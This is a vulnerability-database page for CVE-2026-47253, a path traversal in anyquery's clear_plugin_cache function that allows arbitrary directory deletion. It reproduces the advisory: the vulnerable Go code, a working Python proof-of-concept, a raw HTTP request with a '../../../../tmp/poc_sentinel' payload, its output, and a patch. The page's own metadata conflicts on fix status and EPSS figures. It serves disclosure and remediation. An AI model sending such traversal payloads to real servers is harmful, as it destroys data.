CVE-2026-47253

HIGHPre-NVD 7.37.3
EchelonGraph scoreLOW confidence

This high-severity CVE scores 7.3 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.0%, top 91% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
7.3
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 7.3Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Anyquery has Path Traversal through clear_plugin_cache, Allowing Arbitrary Directory Deletion

Path Traversal in clear_plugin_cache Allows Arbitrary Directory Deletion

| Field | Value | | ---------------- | ----- | | Repository | julien040/anyquery | | Affected version | 0.4.4 | | Vulnerability | CWE-22 — Improper Limitation of a Pathname to a Restricted Directory | | Severity | High |

Summary

The SQL scalar function clear_plugin_cache(plugin) in namespace/other_functions.go passes the caller-supplied plugin argument directly to path.Join and then to os.RemoveAll, with only an empty-string check as a guard. Because path.Join silently resolves .. segments, a low-privileged bearer-token holder can submit SELECT clear_plugin_cache('../../../../tmp/target') to the /v1/query HTTP endpoint and delete any directory reachable by the server process. In the verified scenario, a directory outside $XDG_CACHE_HOME/anyquery/plugins/ was successfully deleted, confirming full path-traversal exploitation.

Affected Code

namespace/other_functions.go:46pathlib.Join resolves .. segments in attacker-controlled plugin, producing a path outside the cache root

namespace/other_functions.go:53os.RemoveAll unconditionally deletes the traversed path

func clear_plugin_cache(plugin string) string {
	pathToRemove := pathlib.Join(xdg.CacheHome, "anyquery", "plugins", plugin)

if plugin == "" { return "The plugin name is empty" }

// Remove the directory err := os.RemoveAll(pathToRemove) if err != nil { return err.Error() }

return "" }

HTTP JSON body.QueryexecuteQueryLLM (controller/llm.go:420-426) → shell.Run → SQLite clear_plugin_cache(plugin)pathlib.Join(xdg.CacheHome, "anyquery", "plugins", plugin) at other_functions.go:46os.RemoveAll at other_functions.go:53

Proof of Concept

Prerequisites:

  • Docker installed
  • Python 3 with requests package (pip install requests)

Step 1 — Build and start the vulnerable service:

docker build -f Dockerfile -t anyquery-vuln002 .
docker run --rm --name anyquery-vuln002 -p 127.0.0.1:8070:8070 anyquery-vuln002

Step 2 — Run the PoC script (separate terminal):

python3 poc.py

poc.py:

#!/usr/bin/env python3
"""PoC reproduction script — julien040/anyquery / VULN-002

Prerequisites:

  • Docker image built: docker build -f Dockerfile -t anyquery-vuln002 .
  • Container running: docker run --rm --name anyquery-vuln002 -p 127.0.0.1:8070:8070 anyquery-vuln002
  • Python packages: requests (stdlib subprocess also used)

How to run (from this report directory, after Dockerfile service is up): python3 poc.py

Expected on success: Final stdout line begins with RESULT: PASS confirming that the sentinel directory outside the cache root was deleted via clear_plugin_cache path traversal. """

import subprocess import sys import json import requests

BASE_URL = "http://127.0.0.1:8070" CONTAINER = "anyquery-vuln002"

Traversal payload: XDG_CACHE_HOME=/root/.cache, so

path.Join("/root/.cache","anyquery","plugins","../../../../tmp/poc_sentinel")

resolves to /tmp/poc_sentinel (4 levels up escapes the cache root).

TRAVERSAL_PLUGIN = "../../../../tmp/poc_sentinel" SENTINEL_PATH = "/tmp/poc_sentinel" QUERY = f"SELECT clear_plugin_cache('{TRAVERSAL_PLUGIN}')"

def docker_exec(cmd): result = subprocess.run( ["docker", "exec", CONTAINER] + cmd, capture_output=True, text=True ) return result.returncode, result.stdout, result.stderr

def sentinel_exists(): rc, _, _ = docker_exec(["test", "-d", SENTINEL_PATH]) return rc == 0

Step 1: create sentinel inside container

print(f"[1] Creating sentinel directory {SENTINEL_PATH} inside container...") rc, out, err = docker_exec(["mkdir", "-p", SENTINEL_PATH]) if rc != 0: sys.exit(f"RESULT: FAIL — could not create sentinel: {err}") if not sentinel_exists(): sys.exit("RESULT: FAIL — sentinel not present after mkdir") print(f" Sentinel created: {SENTINEL_PATH}")

Step 2: confirm server is reachable

print("[2] Confirming server is reachable...") try: r = requests.get(f"{BASE_URL}/list-tables", timeout=5) assert r.status_code == 200, f"unexpected status {r.status_code}" print(f" GET /list-tables → HTTP {r.status_code} OK") except Exception as e: sys.exit(f"RESULT: FAIL — server not reachable: {e}")

Step 3: send traversal request

print("[3] Sending path-traversal payload via POST /execute-query...") payload = {"query": QUERY} r = requests.post( f"{BASE_URL}/execute-query", headers={"Content-Type": "application/json"}, data=json.dumps(payload), timeout=10, ) print(f" HTTP {r.status_code}") print(f" Body: {r.text.strip()}")

if r.status_code != 200: sys.exit(f"RESULT: FAIL — unexpected HTTP status {r.status_code}")

Step 4: verify sentinel is gone

print("[4] Checking whether sentinel was deleted inside container...") if sentinel_exists(): print(f" Sentinel still present — traversal did not delete it.") print(f"RESULT: FAIL — {SENTINEL_PATH} still exists after traversal request") else: print(f" Sentinel GONE — {SENTINEL_PATH} deleted outside cache root.") print(f"RESULT: PASS — clear_plugin_cache('{TRAVERSAL_PLUGIN}') deleted {SENTINEL_PATH} (outside /root/.cache/anyquery/plugins/)")

HTTP request:

POST /execute-query HTTP/1.1
Host: 127.0.0.1:8070
Content-Type: application/json

{"query": "SELECT clear_plugin_cache('../../../../tmp/poc_sentinel')"}

Output:

[1] Creating sentinel directory /tmp/poc_sentinel inside container...
    Sentinel created: /tmp/poc_sentinel
[2] Confirming server is reachable...
    GET /list-tables → HTTP 200 OK
[3] Sending path-traversal payload via POST /execute-query...
    HTTP 200
    Body: +----------------------------------------------------+
| clear_plugin_cache('../../../../tmp/poc_sentinel') |
+----------------------------------------------------+
|                                                    |
+----------------------------------------------------+
1 results
[4] Checking whether sentinel was deleted inside container...
    Sentinel GONE — /tmp/poc_sentinel deleted outside cache root.
RESULT: PASS — clear_plugin_cache('../../../../tmp/poc_sentinel') deleted /tmp/poc_sentinel (outside /root/.cache/anyquery/plugins/)

Impact

An authenticated low-privileged API user can delete any directory accessible to the anyquery server process by supplying a ..-traversing plugin name to clear_plugin_cache. Verified impact is permanent deletion of arbitrary directories outside the intended plugin cache boundary ($XDG_CACHE_HOME/anyquery/plugins/). In a realistic deployment, an attacker could target configuration directories, application data, or the user's home directory, causing irreversible data loss and denial of service. There is no confidentiality impact as the function only deletes and does not read data.

Remediation

In namespace/other_functions.go, resolve the full path and confirm it shares the expected cache-root prefix before calling os.RemoveAll:

func clear_plugin_cache(plugin string) string {
    if plugin == "" {
        return "The plugin name is empty"
    }
    cacheRoot := pathlib.Join(xdg.CacheHome, "anyquery", "plugins")
    pathToRemove := pathlib.Join(cacheRoot, plugin)
    rel, err := filepath.Rel(cacheRoot, pathToRemove)
    if err != nil || strings.HasPrefix(rel, "..") || rel == ".." {
        return "Invalid plugin name"
    }
    if err := os.RemoveAll(pathToRemove); err != nil {
        return err.Error()
    }
    return ""
}

As a defence-in-depth measure, also reject plugin values containing /, \, or a leading . at the input level before the path.Join call, so traversal sequences are blocked at the earliest opportunity.

CVSS v3
7.3
EG Score
7.3(low)
EPSS
9.1%
KEV
Not listed

Published

June 10, 2026

Last Modified

June 10, 2026

Vendor Advisories for CVE-2026-47253(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
Go(1)
PackageVulnerable rangeFixed inDependents
github.com/julien040/anyquery0.4.5

Data Freshness Timeline

(refreshed 12× in last 7d / 57× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-07 06:12 UTCEG score recompute
  2. 2026-07-05 22:27 UTCEG score recompute
  3. 2026-07-05 11:13 UTCEG score recompute
  4. 2026-07-04 22:54 UTCEG score recompute
  5. 2026-07-04 11:43 UTCEG score recompute
  6. 2026-07-03 15:00 UTCEG score recompute
  7. 2026-07-03 01:49 UTCEG score recompute
  8. 2026-07-02 14:40 UTCEG score recompute
  9. 2026-07-02 03:30 UTCEG score recompute
  10. 2026-07-01 16:21 UTCEG score recompute
  11. 2026-07-01 05:12 UTCEG score recompute
  12. 2026-06-30 17:37 UTCEG score recompute
  13. 2026-06-30 06:07 UTCEG score recompute
  14. 2026-06-29 18:57 UTCEG score recompute
  15. 2026-06-29 07:15 UTCEG score recompute
  16. 2026-06-28 20:00 UTCEG score recompute
  17. 2026-06-28 08:51 UTCEG score recompute
  18. 2026-06-27 21:43 UTCEG score recompute
  19. 2026-06-27 10:33 UTCEG score recompute
  20. 2026-06-26 23:23 UTCEG score recompute
  21. 2026-06-26 12:15 UTCEG score recompute
  22. 2026-06-25 23:21 UTCEG score recompute
  23. 2026-06-25 12:12 UTCEG score recompute
  24. 2026-06-25 01:03 UTCEG score recompute
  25. 2026-06-24 13:54 UTCEG score recompute
Show 32 more
  1. 2026-06-24 02:35 UTCEG score recompute
  2. 2026-06-23 15:26 UTCEG score recompute
  3. 2026-06-23 02:27 UTCEG score recompute
  4. 2026-06-22 15:17 UTCEG score recompute
  5. 2026-06-22 04:06 UTCEG score recompute
  6. 2026-06-21 14:15 UTCEG score recompute
  7. 2026-06-21 01:31 UTCEG score recompute
  8. 2026-06-20 12:45 UTCEG score recompute
  9. 2026-06-20 01:36 UTCEG score recompute
  10. 2026-06-19 14:11 UTCEG score recompute
  11. 2026-06-19 03:01 UTCEG score recompute
  12. 2026-06-18 15:51 UTCEG score recompute
  13. 2026-06-18 04:13 UTCEG score recompute
  14. 2026-06-17 17:03 UTCEG score recompute
  15. 2026-06-17 05:39 UTCEG score recompute
  16. 2026-06-16 18:29 UTCEG score recompute
  17. 2026-06-16 07:17 UTCEG score recompute
  18. 2026-06-15 20:07 UTCEG score recompute
  19. 2026-06-15 08:53 UTCEG score recompute
  20. 2026-06-14 23:18 UTCEPSS rescore
  21. 2026-06-14 21:40 UTCEG score recompute
  22. 2026-06-14 10:32 UTCEG score recompute
  23. 2026-06-13 23:23 UTCEG score recompute
  24. 2026-06-13 23:00 UTCEPSS rescore
  25. 2026-06-13 12:14 UTCEG score recompute
  26. 2026-06-13 01:05 UTCEG score recompute
  27. 2026-06-12 23:12 UTCEPSS rescore
  28. 2026-06-12 13:55 UTCEG score recompute
  29. 2026-06-12 02:46 UTCEG score recompute
  30. 2026-06-11 15:37 UTCEG score recompute
  31. 2026-06-11 04:26 UTCEG score recompute
  32. 2026-06-10 17:17 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-47253?
CVE-2026-47253 is a high vulnerability published on June 10, 2026. Anyquery has Path Traversal through clearplugincache, Allowing Arbitrary Directory Deletion Path Traversal in clearplugincache Allows Arbitrary Directory Deletion | Field | Value | | ---------------- | ----- | | Repository | julien040/anyquery | | Affected version | 0.4.4 | | Vulnerability | CWE-22…
When was CVE-2026-47253 disclosed?
CVE-2026-47253 was first published in the National Vulnerability Database on June 10, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-47253 actively exploited?
CVE-2026-47253 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 9.1% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-47253?
CVE-2026-47253 has a CVSS v4.0 base score of 7.3 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-47253?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-47253, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-47253

Explore →

Is Your Infrastructure Affected by CVE-2026-47253?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.